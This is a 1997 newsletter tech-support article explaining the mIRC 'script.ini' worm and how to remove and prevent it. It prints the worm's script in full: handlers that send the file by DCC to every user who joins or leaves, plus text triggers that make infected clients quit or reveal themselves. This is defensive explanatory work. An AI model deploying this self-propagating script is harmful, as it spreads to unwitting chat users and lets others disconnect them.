Tech Support...
The So-Called "Script Virus"
an explanation and "cure" from Bubba
Scenario 1:
You just checked into your favorite channel. Suddenly, before you can even read the nickname list, a DCC window pops up from someone you know asking if you want to receive the file "script.ini." Do you click "YES" or click "NO?"
Scenario 2:
For the last week, every time you check into a channel, people who join keep asking you what is that file that you sent them, or people joining the channel start insisting that you QUIT trying to send them that *%!@&* file!
What is happening here? Why is someone trying to send you a file as soon as you join the channel? Why are people asking you to stop sending them something you never tried to send? It's the so-called "script virus" at work, trying to replicate itself. First of all, however, relax - THIS IS NO VIRUS! Nor is the "script virus" even dangerous. It is a nuisance, but it is harmless, and what's even better is that it is easy to get rid of.
The "script virus" probably got its name because it tries to reproduce itself automatically like a virus. Unlike a virus, however, the "script virus" stops there and does no harm to your computer or anyone elses. True viruses are composed of binary code residing inside executable files (.exe, .com and MS Word Macros - which run inside of the MS macro generator, an executable program within MS Word itself). That is why you can get a virus ONLY from an executable file such as a .com, .exe or MS Word macro.
What makes the script virus a nuisance is that it preys on less knowledgeable users, seeming to "hide" in their system, and seeking to propagate itself by DCC transfer to everyone who joins or leaves any channel, every time they join and leave! Often the "infected" person has no idea that s/he even has the thing running; and that same person often has even less idea of how to make it stop running. Not to worry- here you will find a simple process for disabling and removing the so-called "script virus."
Removing the so-called "script virus:"
This "virus" is actually nothing more than an ".ini" file residing in the mIRC directory along with aliases.ini, events.ini, etc. It is called "script.ini" and removing it will end your problem. The removal is a two step process:
1) ERASE the script.ini file from the mIRC directory altogether or simply MOVE (not copy) it to another directory.
In Windows 95: RIGHT CLICK on the "Start" button and choose "Explore." In "Explore" navigate to the mIRC directory (usually C:\mirc) and highlight it. Find the file named "script.ini" and delete it by dragging it to the "Recycle Bin" and dropping it there, or by RIGHT CLICKING on it and choosing "Delete." In addition to erasing the script.ini file, you must unload the script before you are rid of it.
2) UNLOAD the script.ini from mIRC using the /unload command.
In any window type the command: /unload -rs script.ini <enter> Be sure the forward slash is before the command, and the -rs is required. You should see a notice that script.ini has been unloaded. You must unload the script as well as erase it to be rid of it. If you fail to do either one of the two steps, you will "reinfect" yourself and continue to have a problem.
Once you have erased the script.ini file AND unloaded script.ini, exit mIRC and restart it; you will be cured of the nuisance of the "script virus."
A FINAL NOTE: The so-called "script virus" can only spread maliciously to those who receive DCC transfers into their mIRC directory. If you will change the directory into which downloads are saved to something other than the mIRC directory, you will not have this or related problems again. As a matter of principle, you should NEVER receive DCC transfers directly into your mIRC directory.
How the so-called "script virus" works:
The so-called "script virus" is actually no "virus" at all but an ".ini" file functioning within mIRC, much like aliases.ini, events.ini, etc. function. When mIRC starts up, it looks for several ".ini" files which it loads without having to be told to do so, and one of the files mIRC looks for and loads if present is "script.ini." Whatever is in the "script.ini" file is then available for mIRC to use, just like your aliases, various automatic greets and so on.
The content of the "script.ini" file functions similarly to an autogreet, offering to send itself as a DCC transfer to everyone who joins the channel. The hope of the initiator of the "virus" is that users will "auto accept" this transfer straight into their mIRC directories. When this happens, the next time the "infected" user starts up mIRC the script will load (invisibly as far as the user is concerned) and will try to send itself to everyone joining or leaving the channel on which the infected user is operating.
If you do not have "auto accept" turned on you have a chance to refuse "script.ini" when someone tries to send it to you. If you do not receive DCC transfers directly into your mIRC directory, then even if you do accept "script.ini" you are not in danger since mIRC will not automatically load a script by that name from any other directory. Thus, two normal procedures (or procedures that should be normal) are actually adequate protection against this or any other nuisance - such as someone sending you an empty aliases.ini that automatically "replaces" the one you worked so hard to build.
For the really curious, the complete script contents are listed below and examined in detail:
[script]
ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
/dcc send $nick $mircdirscript.ini
}
This is the "meat" of the script. After the obligatory beginning, [script], the "trigger" ON JOIN command detects a new person joining the channel. Then "{/if ($nick == $me)..." keeps the script from trying to DCC to itself. Finally, if the joining person is someone other than the "infected" user ($me) then the DCC transfer of the file named "script.ini" from the "infected" user's mIRC directory is automatically started.
ON 1:PART:#:{ /if ( $nick == $me ) { halt }
/dcc send $nick $mircdirscript.ini
}
Notice the similarity between this and the "ON JOIN" statement above. This section repeats the offer to DCC transfer "script.ini" whenever anyone leaves the channel - really annoying.
Now comes the malicious part:
ON 1:TEXT:*ouch*:#:/quit iNFeCTeD!
This triggers when a certain text "string" is seen by mIRC, in this case any word with the letters "ouch" in it. That means it would trigger with "couch," "touch," "grouchy," "pouches," etc. When that string is seen by mIRC, the "infected" user's mIRC shuts itself down (/quit) and sends the message "iNFeCTeD" to the channel window for the other users to see.
ON 1:TEXT:*XX!XX*:*:/msg $nick i'm iNFeCTeD!
This "TEXT" trigger lets someone see if you are using the script.ini malicious file. If I wanted to check you, for example, I would type XX!XX in the channel window, and your mIRC would respond to me in a "message" window saying "i'm iNFeCTeD." I could then use that message window to harrass you, or could type "ouch" in the channel window and cause you to shut down.Warning: DO NOT send this in #50+retired to "test" if anyone is "infected."
ON 1:TEXT:*ananas*:#:{
/nick _XInFected
%i = 0
%opit = $opnick(0,$chan)
:looppi
%i = %i + 1
/if ($opnick(%i,$chan) != $me ) { %line = $opnick(%i,$chan) }
/i
I'm not sure that this command would actually work, or how, but what is clear here is that the script is intended to change the "infected" user's nick to "_XInFected" when it sees the text string "ananas." So, for example, I could enter the channel and say, "Your DCC stuff is driving me bananas! and anyone infected would see their nick change suddenly.
The rest of the script is designed to deal with nick changes for several infected people on a channel since they can't all have the nick, "_XInFected." The script looks over nick changes as they are made, and puts numbers in front of nicks as necessary so that no two are the same resulting in "_XInFected," "_1InFected," "_2InFected" and so on.
--- end of explanation ---
So much for the (lame) attempt to wreck IRC with the so-called "script virus." Knowledge is not only power, but a pretty good defense. If you have the "infection," remove it as explained above. To prevent "infection," take the precautions listed above. May your holiday be free of "infection," and your new year's resolutions include TURNING OFF "auto accept" and making a special directory to receive DCC transferred files.
See you on the channel!
Bubba
Reprinted from the December 1997 edition of the 50+retired Newsletter. Copyright 1997, Arch C. Baker, all rights reserved.